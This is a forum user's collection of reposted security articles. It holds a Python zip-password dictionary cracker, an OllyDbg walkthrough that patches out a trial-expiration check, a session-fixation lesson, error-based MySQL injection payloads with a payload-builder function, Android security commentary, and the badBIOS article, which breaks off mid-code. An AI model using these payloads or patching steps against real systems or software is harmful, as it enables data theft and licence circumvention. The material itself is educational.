Everything posted by Nytro
-
[h=2]Sample Code – Dictionary Zip Cracker[/h] Posted by Adam on November 4, 2013 Leave a comment (0) Go to comments

After reading Violent Python, I decided to try my hand at making a basic dictionary zip cracker just for fun. Some of the other free open source tools out there are better, but it does work. I'm primarily posting it for fun and to test the blog's new syntax highlighting. It can generate a biographical dictionary from a specified file's ASCII strings as well as populate it with a recursive directory listing. I got the idea while studying for my AccessData cert. Their Password Recovery Toolkit does this in hopes of increasing the likelihood that the dictionary will contain a relevant password. The idea is that a user either used the word in the past or that it can be found elsewhere on his or her computer. A very cool idea that's helped me on forensics challenges. I've designed the code below for Python 2.7.5 on Windows 7. It uses the Strings binary from Picnix Utils. You can also click here to download a copy.

```python
import argparse
import zipfile
import subprocess
import os

print '''
SYNTAX:
Dictionary attack:        zipdict.py -f (zip) -d (dict)
Bio dictionary generator: zipdict.py -f (zip) -s (file with desired strings)
'''

parser = argparse.ArgumentParser(description='Zip file dictionary attack tool.')
parser.add_argument('-f', help='Specifies input file (ZIP)', required=True)
parser.add_argument('-d', help='Specifies the dictionary.', required=False)
parser.add_argument('-s', help='Build ASCII strings dictionary.', required=False)
args = parser.parse_args()

zfile = zipfile.ZipFile(args.f)
print '{*} Cracking: %s' % args.f
print '{*} Dictionary: %s' % args.d

def biodictattack():
    print '{*} Generating biographical dictionary...'
    stringsdict = open('stringsdict', 'w')
    # Harvest printable ASCII strings from the target file
    stringsout = subprocess.Popen(['strings', args.f],
                                  stdout=subprocess.PIPE,
                                  stderr=subprocess.STDOUT)
    for string in stringsout.stdout:
        stringsdict.write(string)
    stringsout.wait()
    # Append a recursive listing of file and directory names
    walkpath = raw_input("Directory listing starting where? [ex. C:\\] ")
    for root, dirs, files in os.walk(walkpath):
        for name in files:
            stringsdict.write(name + '\n')
        for name in dirs:
            stringsdict.write(name + '\n')
    stringsdict.close()
    print '{*} Done. Re-run to crack with zipdict.py -f (zip) -d stringsdict'

def dictattack():
    with open(args.d, 'r') as dictionary:
        for line in dictionary:
            dictword = line.strip('\n')
            try:
                zfile.extractall(pwd=dictword)
                print '{*} Password found = ' + dictword
                print '{*} File contents extracted to zipdict path.'
                exit(0)
            except Exception:
                pass
    print '{*} Password not found in dictionary.'

if args.s:
    biodictattack()
else:
    dictattack()
```

My next post will be on analyzing Volume Shadow Copies on Linux and some cool methods that I used on the 2013 DC3 Forensic Challenge.

Sursa: Sample Code - Dictionary Zip Cracker | fork()
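The biographical-dictionary idea (harvesting candidate passwords from file and directory names on the suspect machine) can also be sketched in modern Python 3 without the external strings binary. This is just an illustration of the technique, not part of the script above; the function name build_wordlist is my own:

```python
import os

def build_wordlist(walk_root):
    """Collect candidate passwords from file and directory names,
    mirroring the 'biographical dictionary' idea described above."""
    words = set()
    for root, dirs, files in os.walk(walk_root):
        for name in files + dirs:
            words.add(name)                       # full name, e.g. notes.txt
            words.add(os.path.splitext(name)[0])  # bare stem, e.g. notes
    return sorted(words)
```

Pointing it at an evidence mount (e.g. `build_wordlist('/mnt/evidence')`) yields a deduplicated wordlist you can feed straight into the dictionary attack.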
-
Understanding Session Fixation

1. Introduction

A session ID is used to identify the user of a web application. It can be sent with the GET method. An attacker can send the user a link with a predefined session ID. When the user logs in, the attacker can impersonate him, because the user uses the predefined session ID, which is known to the attacker. This is how session fixation works. As we can see, there is no need to guess the session ID, because the attacker simply chooses the session ID that will be used by the victim.

2. Environment

Let's analyze session fixation step by step in one of the lessons available in WebGoat [1]. WebGoat is a web application that is intentionally vulnerable. It can be useful for those who want to play with web application security. The goal of WebGoat is to teach web application security lessons. WebGoat is part of the Samurai Web Testing Framework [2], a Linux-based environment for web penetration testing. The lesson in question is entitled "Session Fixation" (part of "Session Management Flaws"). It was created by Reto Lippuner and Marcel Wirth.

3. Session Fixation Lesson from WebGoat

The attacker first sends a mail to the victim with a predefined session ID (SID); it has the value 12345 for the purpose of demonstration. The attacker has to convince the user to click the link. The victim gets the mail and clicks the link to log in. As we can see, the link has a predefined session ID. The victim logs into the web application and is recognized by the attacker's predefined session ID. The attacker knows the predefined session ID and is able to impersonate the user.

4. Summary

Users can be impersonated when they use links with predefined session ID values chosen by the attacker. Session fixation was described, and the lesson from WebGoat ("Session Fixation" from "Session Management Flaws," created by Reto Lippuner and Marcel Wirth) was presented to analyze session fixation step by step.
The mitigation for session fixation is session ID regeneration after the user successfully logs in. The predefined session ID would then no longer be of any use to the attacker.

References:
[1] WebGoat https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project (access date: 22 October 2013)
[2] Samurai Web Testing Framework (access date: 22 October 2013)

By Dawid Czagan|October 31st, 2013

Sursa: Understanding Session Fixation - InfoSec Institute
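The regeneration step can be sketched in a few lines of Python. This is a minimal, purely illustrative in-memory session store (the `SessionStore` class and its methods are my own invention, not WebGoat code):

```python
import secrets

class SessionStore:
    """Minimal in-memory session store illustrating session ID
    regeneration on login - the mitigation described above."""
    def __init__(self):
        self.sessions = {}  # sid -> session data

    def new_session(self):
        # Pre-login session: no user attached yet
        sid = secrets.token_hex(16)
        self.sessions[sid] = {'user': None}
        return sid

    def login(self, sid, user):
        # Discard the pre-login session ID entirely; an
        # attacker-fixated SID becomes useless after this point.
        data = self.sessions.pop(sid, {'user': None})
        data['user'] = user
        new_sid = secrets.token_hex(16)
        self.sessions[new_sid] = data
        return new_sid
```

After login the old SID no longer maps to any session, so a link carrying a predefined SID (like 12345 in the lesson) buys the attacker nothing.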
-
Reverse Engineering with OllyDbg

Abstract

The objective of this paper is to explain how to crack an executable without peeping at its source code, using the OllyDbg tool. Although there are many tools that can achieve the same objective, the beauty of OllyDbg is that it is simple to operate and freely available. We have already done much reverse engineering of .NET applications. This time, we are confronted with an application whose origin is unknown altogether. In simple terms, we don't have the actual source code; we have only the executable, which makes reverse engineering a tedious task.

Essentials

The security researcher must have rigorous knowledge of assembly language. It is expected that the machine is configured with the following:

OllyDbg
Assembly programming knowledge
CFF Explorer

Patching Native Binaries

When the source code is not provided, it is still possible to patch the corresponding software binaries in order to remove various security restrictions imposed by the vendor, as well as to fix inherent bugs. A familiar type of restriction built into software is copy protection, which is normally enforced by the software vendor to ensure the product is properly licensed. In copy protection, the user is typically obliged to register the product before use. The vendor stipulates a time restriction on beta software in order to avoid license misuse and permits the product to run only in a reduced-functionality mode until the user registers.

Executable Software

The following sample shows a way of bypassing or removing the copy protection in order to use the product without extending the trial duration or, in fact, without purchasing the full version. The copy protection mechanism often involves a process in which the software checks whether it should run and, if it should, which functionality should be allowed.
One type of copy protection common in trial or beta software allows a program to run only until a certain date. To demonstrate, we have downloaded a beta version of some software from the Internet that is operative for 30 days. As you can see, the trial has expired: the application no longer works and shows an error message when we try to execute it. We don't know in which programming language or on which platform this software was developed, so the first task is to identify its origin. We can engage CFF Explorer, which displays some significant information, such as that this software was developed using VC++, as shown below. We can easily conclude that this is a native executable and that it is not executing under the CLR, so we can't use ILDASM or Reflector to analyze its opcodes. This time, we have to choose a different approach to crack the native executable.

Disassembling with OllyDbg

When we attempt to load the SoftwareExpiration.exe file, it refuses to run because the current date is past the date on which the authorized trial expired. How can we use this software despite the expiration of the trial period? The following section illustrates the steps for removing the copy protection restriction.

The Road Map

1. Load the expired program in order to understand what is happening behind the scenes.
2. Debug the program with OllyDbg.
3. Trace the code backward to identify the code path.
4. Modify the binary to force all code paths to succeed and never hit the trial expiration code path again.
5. Test the modifications.

Such tasks can also be accomplished with a more powerful tool, IDA Pro, but it is commercial and not freely available. OllyDbg is not as powerful as IDA Pro, but it is useful in many scenarios. First download OllyDbg from its official website and configure it properly on your machine.
Its interface looks like this: Now open the SoftwareExpiration.exe program in OllyDbg from the File → Open menu and it will disassemble the binary file. Don't be afraid of the bizarre assembly code, because all the modifications are performed in native assembly code. Here the red box shows the entry point instructions of the program, at address 00401204. The CPU main thread window displays the software code in the form of assembly instructions that are executed in top-to-bottom fashion. That is why, as we stated earlier, assembly programming knowledge is necessary when reverse engineering a native executable. Unfortunately, we don't have the actual source code, so how can we inspect the assembly code? Here the error message "Sorry, this trial software has expired" might help us solve this problem: with the help of this error message, we can identify the actual code path that leads to it. While the error dialog box is still displayed, start debugging by pressing F9 or from the Debug menu. Now you can find the time-limit code. Next, press F12 in order to pause code execution so that we can find the code that causes the error message to be displayed. Now view the call stack by pressing Alt+K. Here, you can easily figure out that the trial error text is a parameter of MessageBoxA, as follows: Select the USER32.MessageBoxA entry near the bottom of the call stack, right-click, and choose "Show call": This shows the starting point, with the assembly call to MessageBoxA selected. Notice the greater-than symbol (>) next to some of the lines of code, which indicates that another line of code jumps to that location. Directly before the call to MessageBoxA (in red in the right pane), four parameters are pushed onto the stack. Here the PUSH 10 instruction carries the > sign, meaning it is referenced by another line of code.
Select the PUSH 10 instruction located at address 004011C0; the line of code that references the selected line is displayed in the text area below the top pane of the CPU window, as follows: Select the text area code in the above figure and right-click to open the shortcut menu. It allows you to easily navigate to the code that refers to a selected line of code, as shown: We have now identified the actual line of code that is responsible for producing the error message. Now it is time to modify the binary code. The context menu in the previous figure shows that both 00401055 and 00401063 contain JA (jump if above) instructions leading to the PUSH 10 used for the message box. First select "Go to JA from 00401055" from the context menu. You should now be on the code at location 0x00401055. Your ultimate objective is to prevent the program from hitting the error code path. This can be accomplished by changing the JA instruction to NOP (no operation), which does nothing at all. Right-click the 0x00401055 instruction inside the CPU window, select "Binary," and click "Fill with NOPs" as shown below: This operation fills all the bytes of the instruction at 0x00401055 with NOPs: Go back to PUSH 10 by pressing the hyphen (-) key and repeat the previous process for the instruction at 0x00401063, as follows: Now save the modifications by right-clicking in the CPU window, clicking "Copy to executable," and then clicking "All modifications." Then hit the "Copy all" button in the next dialog box, as shown below: Right after hitting the "Copy all" button, a new window named "SoftwareExpiration.exe" will appear. Right-click in this window and choose "Save file": Finally, save the modified or patched binary under a new name. Now load the modified program; you can see that no expiration error message is shown. We have successfully defeated the trial expiration restriction.
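Outside OllyDbg, the same NOP-out patch can be applied with a few lines of Python. The opcode bytes and offset below are made-up toy values, not the real SoftwareExpiration.exe layout; the only facts relied on are that a short JA is encoded as 0x77 followed by an offset byte, and that NOP is 0x90:

```python
def nop_out(data, offset, length):
    """Return a copy of `data` with `length` bytes at `offset`
    replaced by NOP (0x90) instructions."""
    if offset + length > len(data):
        raise ValueError('patch range outside binary')
    return data[:offset] + b'\x90' * length + data[offset + length:]

# Toy "binary": push ebp; mov ebp,esp; JA +0x10 (77 10); push 10
code = b'\x55\x8b\xec\x77\x10\x6a\x10'
patched = nop_out(code, 3, 2)   # NOP out the 2-byte JA
print(patched.hex())
```

In practice you would compute the file offset of the instruction from its virtual address (as shown in the OllyDbg panes) before patching.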
Final Note

This article demonstrated one way to challenge the strength of a copy protection measure using OllyDbg and to identify ways to make your software more secure against unauthorized use. By attempting to defeat the copy protection of your application, you can learn a great deal about how robust the protection mechanism is. By doing this testing before the product becomes publicly available, you can modify the code to make circumvention of the copy protection more difficult before release.

By Ajay Yadav|November 1st, 2013

Sursa: Reverse Engineering with OllyDbg - InfoSec Institute
-
Android 4.4 arrives with new security features - but do they really matter?

Stefan Tanase
Kaspersky Lab Expert
Posted November 04, 15:53 GMT

Last week, Google released version 4.4 (KitKat) of its hugely popular Android OS. Among the improvements, some have noticed several security-related changes. So, how much more secure is Android 4.4? Android 4.4's major security improvements can be divided into two categories:

1. Digital certificates

Android 4.4 will warn the user if a Certificate Authority (CA) is added to the device, making it easy to identify man-in-the-middle attacks inside local networks. At the same time, Google certificate pinning will make it harder for sophisticated attackers to intercept network traffic to and from Google services, by making sure only whitelisted SSL certificates can be used to connect to certain Google domains.

2. OS hardening

SELinux now runs in enforcing mode instead of permissive mode. This helps enforce permissions and thwart privilege escalation attacks, such as exploits that want to gain root access. Android 4.4 also comes compiled with FORTIFY_SOURCE set at level 2, making buffer overflow exploits harder to implement. Privilege escalation and buffer overflows are techniques used for rooting mobile phones, so this makes it harder for Android 4.4 users to get root access on their devices. On the bright side, it also makes it harder for malware to do the same - and gaining root is an important step in the infection of Android-based devices.

From the point of view of malware threats, these enhancements do not really make a big difference. The most common Android infection source remains the same: unofficial apps downloaded from third-party stores. Nothing has changed here. One of the biggest problems in the Android ecosystem is the large number of different versions of the OS, including ancient ones, still running on users' mobile devices - this is known as version fragmentation.
For instance, more than 25% of users are still running Android 2.3, which was released years ago. This, among other things, represents a big security issue. Therefore, perhaps the most important change in KitKat is the lowered resource usage. Android 4.4 can run on devices with just 512MB of RAM, which for high-end hardware means faster operation and better battery life, and for devices with fewer resources, the chance to run a modern, more secure OS. Power users have always wanted to use the latest versions of Android on their devices - that's why phone rooting has become so popular and why community projects such as CyanogenMod have evolved into fully-fledged companies. The real problem here is that most non-technical users have to rely on hardware vendors to get an Android update. For instance, I have an old smartphone from a leading mobile phone maker from South Korea that stopped receiving updates at Android 2.3.3. Sadly, many mobile phone makers prefer to withhold updates as a way of forcing users to purchase newer devices. At the same time, this effectively increases the risk across their entire user base. It's a pity this problem is not discussed more widely.

Sursa: https://www.securelist.com/en/blog/208214116/Android_4_4_arrives_with_new_security_features_but_do_they_really_matter
-
Notacon 10 - Encryption For Everyone

Dru Streicher (_Node)

Description: Encryption protects your privacy and is essential for communication. However, encryption is sometimes complicated and hard to use. I want to discuss what encryption is and how it is used, and make it easy for everyone to use. This will be a very n00b-friendly talk about how to actually use encryption in email, in websurfing, and on your hard drive.

Bio: I am a hardware hacker, chiptune musician (_node), and a system admin. I am a system administrator for Hurricane Labs (www.hurricanelabs.com), an information security company based in Cleveland. I am interested in security and all things open source. I attended Notacon last year for the first time and performed at pixeljam. I really had a good time last year and I would enjoy presenting a paper this year.

For more information please visit: Notacon 11: April 10-13, 2014 in Cleveland, OH Notacon 10 (2013) Videos (Hacking Illustrated Series InfoSec Tutorial Videos)

Sursa: Notacon 10 - Encryption For Everyone Dru Streicher (_Node)
-
Blackhat EU 2013 - The Sandbox Roulette: Are You Ready For The Gamble?

Description: What goes inside an application sandbox always stays inside the sandbox. Is it REALLY so? This talk is focused on exploit vectors used to evade commercially available sandboxes, Las Vegas-style: we'll spin a "Sandbox Roulette" with various vulnerabilities on the Windows operating system and then show how various application sandboxes hold up to each exploit. Each exploit will be described in detail, along with how it affected the sandbox. There is a growing trend in enterprise security practices to decrease the attack surface of vulnerable endpoints through the use of application sandboxing. Many different sandbox environments have been introduced by vendors in the security industry, including OS vendors and even application vendors. The lack of sandboxing standards has led to the introduction of a range of solutions without consistent capabilities or compatibility, each with its own inherent limitations. Moreover, some application sandboxes are used by malware analysts to analyze malware, and this could pose risks if the sandbox were breached. This talk will present an in-depth, security-focused, technical analysis of the application sandboxing technologies available today. It will provide a comparison framework for different vendor technologies that is consistent, measurable, and understandable by both IT administrators and security specialists. In addition, we will explore each of the major commercially available sandbox flavors and evaluate their ability to protect enterprise data and the enterprise infrastructure as a whole. We will provide an architectural decomposition of sandboxing to highlight its advantages and limitations, and will interweave the discussion with examples of exploit vectors that are likely to be used by sophisticated malware to actively target sandboxes in the future.
For More Information please visit : - Black Hat | Europe 2013 - Briefings Sursa: Blackhat Eu 2013 - The Sandbox Roulette: Are You Ready For The Gamble?
-
Error Based SQL Injection - Tricks In The Trade

Trigger an error

In this article I am going to describe some simple tips and tricks that are useful to find and/or exploit error-based SQL injection. The tips/tricks will be for MySQL and PHP, because these are the most common systems you will encounter.

Detect if database errors are displayed: Knowing whether database errors are displayed is really valuable information, because it simplifies the process of detecting injection points and exploiting a SQL vulnerability; we will discuss this in more detail later. But how do you provoke an error, even if everything is escaped correctly? Look for the integers. Example: http://vulnsite.com/news.php?id=1 Let us assume id is used internally as an integer in a MySQL query. Testing vectors like id=1' or id=2-1 will not provoke any errors, nor will the parameter seem vulnerable to injection. To provoke an error, you can use the following values for id:

1) ?id=0X01
2) ?id=99999999999999999999999999999999999999999

The first example is a valid integer in PHP but not in MySQL, because of the uppercase X (there are even more differences; compare the PHP manual on integers with the MySQL documentation). That's why this value provokes an error in the database. The second example will be converted by PHP to INF (still a valid number in PHP), but it is definitely not a valid integer in the MySQL database. As an example, the query will look like this:

SELECT title,text from news where id=INF

By using this method, it is easy to determine whether error reporting is enabled. This method will only work if the value is used internally as an integer; it won't provoke a database error if the value is used as a string.

Using error reporting to our advantage: After learning that database errors are displayed, how can we use them to our advantage? In MySQL, it is not as easy as in other DBMSs to extract information via error messages.
But there are two methods to do so:

o) UPDATEXML and extractValue
o) an insane select statement

Personally, I prefer using UPDATEXML (available since MySQL 5.1.5). As its name suggests, it is used to modify an XML fragment by specifying an XPath expression. It has three parameters: the first one is the XML fragment, the second one the XPath expression, and the third one specifies the new fragment that will be inserted. A "normal" example:

SELECT UpdateXML('<a><b>ccc</b><d></d></a>', '/b', '<e>fff</e>')

Output: <a><b>ccc</b><d></d></a>

What do you think will happen if you specify an illegal XPath expression, like @@version? Let's take a real life example to see what happens. Let us assume that the num parameter in the following URL:

http://example.com/author.php?num=2

ends up unescaped in the following query:

SELECT name,date,username from author where number=2

Normally you would try to find the number of columns to construct a valid UNION SELECT. But let's assume none of the data is passed back to the webpage. You would then need techniques like time-based (sleep) or out-of-band (DNS, etc.) extraction. If error reporting is enabled, UPDATEXML can shorten this process a lot. To extract the version of the database, the following value for num would be enough:

http://example.com/author.php?num=2 and UPDATEXML(null,@@version,null)

==> SELECT name,date,username from author where number=2 and UPDATEXML(null,@@version,null)

This will produce: XPATH syntax error: 'version'

It is also possible to use a complete select statement:

UPDATEXML(null,(select schema_name from information_schema.schemata),null)

Although UPDATEXML seems like a really awesome function, it has a drawback too: it can only extract the last 20 bytes at a time. If you want to extract more bytes and still use error-based extraction, you have to use the second method. The next example will create a query which produces a duplicate entry error.
The duplicate entry will be the name of a table:

select 1 from dual where 1=1 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1),FLOOR(RAND(0)*2)))

That's all for now, but if you want to read on, here are some interesting links regarding SQL injection:

-) The SQL Injection Knowledge Base (the examples were taken from there; really the best SQL injection cheat sheet, IMHO)
-) Methods of Quick Exploitation of Blind SQL Injection
-) SQLi filter evasion cheat sheet (MySQL) | Reiners' Weblog

About The Author

Alex Infuhr is an independent security researcher. His core areas of research include malware analysis and WAF bypassing.

Sursa: Error Based SQL Injection - Tricks In The Trade | Learn How To Hack - Ethical Hacking and security tips
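Building the UPDATEXML payloads by hand gets tedious, especially with the length limit mentioned above forcing you to extract in slices. The sketch below only builds payload strings; the slicing via MID() and the 0x7e (~) marker are common conventions I'm assuming here, not something prescribed by the article:

```python
def updatexml_payload(subquery, offset=1, length=20):
    """Build an error-based extraction payload using UPDATEXML.
    MID() slices the subquery result so each request fits within
    the truncated error message; bump `offset` to get the next slice."""
    inner = "MID((%s),%d,%d)" % (subquery, offset, length)
    # CONCAT with 0x7e (~) guarantees an invalid XPath expression,
    # so the sliced value is reflected in the error text.
    return " and UPDATEXML(null,CONCAT(0x7e,%s),null)" % inner

print(updatexml_payload("select @@version"))
```

Appending the returned string to the vulnerable num parameter and stepping `offset` by `length` walks through arbitrarily long results 20 bytes at a time.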
-
The answer is simple: a hacker is NOT a criminal. There are two types of people:

1. People who discover/create new things: hackers
2. People who use them: everyone else

In other words:
- you discovered a new SQL injection method (time-based, error-based...): you're a hacker.
- you used such a method to gain access and to brag about being a big shot: you're a limp dick.

The fact that someone discovers a new exploitation method, say time-based SQLi, or creates something useful, say Metasploit/nmap... doesn't make them a criminal, it makes them a hacker. The fact that someone else uses that discovery to obtain e-mail addresses, usernames and passwords doesn't make them a hacker, it makes them a criminal. Likewise, the fact that someone uses Metasploit to obtain something illegal (generally speaking) makes them not a hacker but a criminal. That's the idea in short.
-
Is it your money?
-
Mori tigane.
-
I may sound stupid, but what are "Joint Ventures"?
-
Doesn't look bad at all
-
I'd prefer it if you sent the e-mail addresses by PM, if possible. I'm saying this for your own good. Also, maybe don't post your "personal" e-mail address. Again, for your own good.
-
Yes, well done, you're among the few people who still build something... If you have time, even when you find source code for a given piece of functionality, try to write it yourself. Even if you understand a source perfectly, it's not enough until you've written it line by line yourself. I'd also suggest you try C# or even C++.
-
And you say you made the "Remote Desktop" yourself?
-
The interval is far too small; use at least a few milliseconds, not microseconds. It is quite possible that the thread scheduling mechanism takes longer than that (the task switch, saving the registers, and switching to another thread). See also: usleep(3) - Linux man page

[h=2]Errors[/h]

EINTR Interrupted by a signal; see signal(7).
EINVAL usec is not smaller than 1000000. (On systems where that is considered an error.)

Conforming to: 4.3BSD, POSIX.1-2001. POSIX.1-2001 declares this function obsolete; use nanosleep(2) instead. POSIX.1-2008 removes the specification of usleep().

Most likely the system call itself takes longer than the actual sleep. We laugh, we joke, but we're also serious.
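The point about scheduling overhead dwarfing a microsecond sleep is easy to measure. The post is about C's usleep, but the same effect shows up in any language; this Python sketch (my own illustration) times how long a 1-microsecond sleep request actually takes:

```python
import time

def measured_sleep(seconds):
    """Request a sleep and return how long it actually took."""
    start = time.perf_counter()
    time.sleep(seconds)
    return time.perf_counter() - start

requested = 1e-6                     # 1 microsecond
elapsed = measured_sleep(requested)
# The context switch plus timer granularity usually cost far more
# than the single microsecond actually requested.
print("requested %.6fs, got %.6fs" % (requested, elapsed))
```

On a typical desktop the elapsed time comes back orders of magnitude larger than the request, which is exactly why sub-millisecond sleep loops are a waste.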
-
Meet “badBIOS,” the mysterious Mac and PC malware that jumps airgaps

Like a super strain of bacteria, the rootkit plaguing Dragos Ruiu is omnipotent.

by Dan Goodin - Oct 31 2013

Three years ago, security consultant Dragos Ruiu was in his lab when he noticed something highly unusual: his MacBook Air, on which he had just installed a fresh copy of OS X, spontaneously updated the firmware that helps it boot. Stranger still, when Ruiu then tried to boot the machine off a CD-ROM, it refused. He also found that the machine could delete data and undo configuration changes with no prompting. He didn't know it then, but that odd firmware update would become a high-stakes malware mystery that would consume most of his waking hours.

In the following months, Ruiu observed more odd phenomena that seemed straight out of a science-fiction thriller. A computer running the OpenBSD operating system also began to modify its settings and delete its data without explanation or prompting. His network transmitted data specific to the Internet's next-generation IPv6 networking protocol, even from computers that were supposed to have IPv6 completely disabled. Strangest of all was the ability of infected machines to transmit small amounts of network data to other infected machines even when their power cords and Ethernet cables were unplugged and their Wi-Fi and Bluetooth cards were removed. Further investigation soon showed that the list of affected operating systems also included multiple variants of Windows and Linux.

"We were like, 'Okay, we're totally owned,'" Ruiu told Ars. "'We have to erase all our systems and start from scratch,' which we did. It was a very painful exercise. I've been suspicious of stuff around here ever since." In the intervening three years, Ruiu said, the infections have persisted, almost like a strain of bacteria that's able to survive extreme antibiotic therapies.
Within hours or weeks of wiping an infected computer clean, the odd behavior would return. The most visible sign of contamination is a machine's inability to boot off a CD, but other, more subtle behaviors can be observed when using tools such as Process Monitor, which is designed for troubleshooting and forensic investigations. Another intriguing characteristic: in addition to jumping "airgaps" designed to isolate infected or sensitive machines from all other networked computers, the malware seems to have self-healing capabilities. "We had an air-gapped computer that just had its [firmware] BIOS reflashed, a fresh disk drive installed, and zero data on it, installed from a Windows system CD," Ruiu said. "At one point, we were editing some of the components and our registry editor got disabled. It was like: wait a minute, how can that happen? How can the machine react and attack the software that we're using to attack it? This is an air-gapped machine and all of the sudden the search function in the registry editor stopped working when we were using it to search for their keys." Over the past two weeks, Ruiu has taken to Twitter, Facebook, and Google Plus to document his investigative odyssey and share a theory that has captured the attention of some of the world's foremost security experts. The malware, Ruiu believes, is transmitted through USB drives to infect the lowest levels of computer hardware. With the ability to target a computer's Basic Input/Output System (BIOS), Unified Extensible Firmware Interface (UEFI), and possibly other firmware standards, the malware can attack a wide variety of platforms, escape common forms of detection, and survive most attempts to eradicate it. But the story gets stranger still.
In posts here, here, and here, Ruiu posited another theory that sounds like something from the screenplay of a post-apocalyptic movie: "badBIOS," as Ruiu dubbed the malware, has the ability to use high-frequency transmissions passed between computer speakers and microphones to bridge airgaps.

Bigfoot in the age of the advanced persistent threat

At times as I've reported this story, its outline has struck me as the stuff of urban legend, the advanced persistent threat equivalent of a Bigfoot sighting. Indeed, Ruiu has conceded that while several fellow security experts have assisted his investigation, none has peer reviewed his process or the tentative findings that he's beginning to draw. (A compilation of Ruiu's observations is here.) Also unexplained is why Ruiu would be on the receiving end of such an advanced and exotic attack. As a security professional, the organizer of the internationally renowned CanSecWest and PacSec conferences, and the founder of the Pwn2Own hacking competition, he is no doubt an attractive target to state-sponsored spies and financially motivated hackers. But he's no more attractive a target than hundreds or thousands of his peers, who have so far not reported the kind of odd phenomena that have afflicted Ruiu's computers and networks. In contrast to the skepticism that's common in the security and hacking cultures, Ruiu's peers have mostly responded with deep-seated concern and even fascination to his dispatches about badBIOS. "Everybody in security needs to follow @dragosr and watch his analysis of #badBIOS," Alex Stamos, one of the more trusted and sober security researchers, wrote in a tweet last week. Jeff Moss, the founder of the Defcon and Blackhat security conferences, who in 2009 began advising Department of Homeland Security Secretary Janet Napolitano on matters of computer security, retweeted the statement and added: "No joke it's really serious." Plenty of others agree.
"Dragos is definitely one of the good reliable guys, and I have never ever even remotely thought him dishonest," security researcher Arrigo Triulzi told Ars. "Nothing of what he describes is science fiction taken individually, but we have not seen it in the wild ever."

Been there, done that

Triulzi said he's seen plenty of firmware-targeting malware in the laboratory. A client of his once infected the UEFI-based BIOS of his Mac laptop as part of an experiment. Five years ago, Triulzi himself developed proof-of-concept malware that stealthily infected the network interface controllers that sit on a computer motherboard and provide the Ethernet jack that connects the machine to a network. His research built off of work by John Heasman that demonstrated how to plant hard-to-detect malware known as a rootkit in a computer's peripheral component interconnect, the Intel-developed connection that attaches hardware devices to a CPU.

It's also possible to use high-frequency sounds broadcast over speakers to send network packets. Early networking standards used the technique, said security expert Rob Graham. Ultrasonic-based networking is also the subject of a great deal of research, including this project by scientists at MIT.

Of course, it's one thing for researchers in the lab to demonstrate viable firmware-infecting rootkits and ultra high-frequency networking techniques. But as Triulzi suggested, it's another thing entirely to seamlessly fuse the two together and use the weapon in the real world against a seasoned security consultant. What's more, use of a USB stick to infect an array of computer platforms at the BIOS level rivals the payload delivery system found in the state-sponsored Stuxnet worm unleashed to disrupt Iran's nuclear program. And the reported ability of badBIOS to bridge airgaps also has parallels to Flame, another state-sponsored piece of malware that used Bluetooth radio signals to communicate with devices not connected to the Internet.
"Really, everything Dragos reports is something that's easily within the capabilities of a lot of people," said Graham, who is CEO of penetration testing firm Errata Security. "I could, if I spent a year, write a BIOS that does everything Dragos said badBIOS is doing. To communicate over ultrahigh frequency sound waves between computers is really, really easy."

Coincidentally, Italian newspapers this week reported that Russian spies attempted to monitor attendees of last month's G20 economic summit by giving them memory sticks and recharging cables programmed to intercept their communications.

Eureka

For most of the three years that Ruiu has been wrestling with badBIOS, its infection mechanism remained a mystery. A month or two ago, after buying a new computer, he noticed that it was almost immediately infected as soon as he plugged one of his USB drives into it. He soon theorized that infected computers have the ability to contaminate USB devices and vice versa.

"The suspicion right now is there's some kind of buffer overflow in the way the BIOS is reading the drive itself, and they're reprogramming the flash controller to overflow the BIOS and then adding a section to the BIOS table," he explained.

He still doesn't know if a USB stick was the initial infection trigger for his MacBook Air three years ago, or if the USB devices were infected only after they came into contact with his compromised machines, which he said now number between one and two dozen. He said he has been able to identify a variety of USB sticks that infect any computer they are plugged into. At next month's PacSec conference, Ruiu said he plans to get access to expensive USB analysis hardware that he hopes will provide new clues behind the infection mechanism.

He said he suspects badBIOS is only the initial module of a multi-staged payload that has the ability to infect the Windows, Mac OS X, BSD, and Linux operating systems.
"It's going out over the network to get something or it's going out to the USB key that it was infected from," he theorized. "That's also the conjecture of why it's not booting CDs. It's trying to keep its claws, as it were, on the machine. It doesn't want you to boot another OS it might not have code for." To put it another way, he said, badBIOS "is the tip of the warhead, as it were."

“Things kept getting fixed”

Ruiu said he arrived at the theory about badBIOS's high-frequency networking capability after observing encrypted data packets being sent to and from an infected laptop that had no obvious network connection with—but was in close proximity to—another badBIOS-infected computer. The packets were transmitted even when the laptop had its Wi-Fi and Bluetooth cards removed. Ruiu also disconnected the machine's power cord so it ran only on battery to rule out the possibility it was receiving signals over the electrical connection. Even then, forensic tools showed the packets continued to flow over the airgapped machine. Then, when Ruiu removed the internal speaker and microphone connected to the airgapped machine, the packets suddenly stopped.

With the speakers and mic intact, Ruiu said, the isolated computer seemed to be using the high-frequency connection to maintain the integrity of the badBIOS infection as he worked to dismantle software components the malware relied on.

"The airgapped machine is acting like it's connected to the Internet," he said. "Most of the problems we were having is we were slightly disabling bits of the components of the system. It would not let us disable some things. Things kept getting fixed automatically as soon as we tried to break them. It was weird."

It's too early to say with confidence that what Ruiu has been observing is a USB-transmitted rootkit that can burrow into a computer's lowest levels and use it as a jumping off point to infect a variety of operating systems with malware that can't be detected.
It's even harder to know for sure that infected systems are using high-frequency sounds to communicate with isolated machines. But after almost two weeks of online discussion, no one has been able to rule out these troubling scenarios, either. "It looks like the state of the art in intrusion stuff is a lot more advanced than we assumed it was," Ruiu concluded in an interview. "The take-away from this is a lot of our forensic procedures are weak when faced with challenges like this. A lot of companies have to take a lot more care when they use forensic data if they're faced with sophisticated attackers." Sursa: Meet “badBIOS,” the mysterious Mac and PC malware that jumps airgaps | Ars Technica
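Graham's claim that communicating "over ultrahigh frequency sound waves between computers is really, really easy" is simple to illustrate in principle: encode bits as bursts of a near-inaudible tone and detect them with a single-bin DFT (the Goertzel algorithm). The Python sketch below is purely illustrative; the sample rate, carrier frequency, and on/off keying are my own assumptions and say nothing about badBIOS's actual scheme, if one exists.

```python
import math

RATE = 48000   # sample rate in Hz (assumed)
FREQ = 18000   # near-ultrasonic carrier in Hz (assumed)
N = 480        # samples per bit period (10 ms)

def tone(bit):
    """One bit period: a sine burst for 1, silence for 0."""
    if not bit:
        return [0.0] * N
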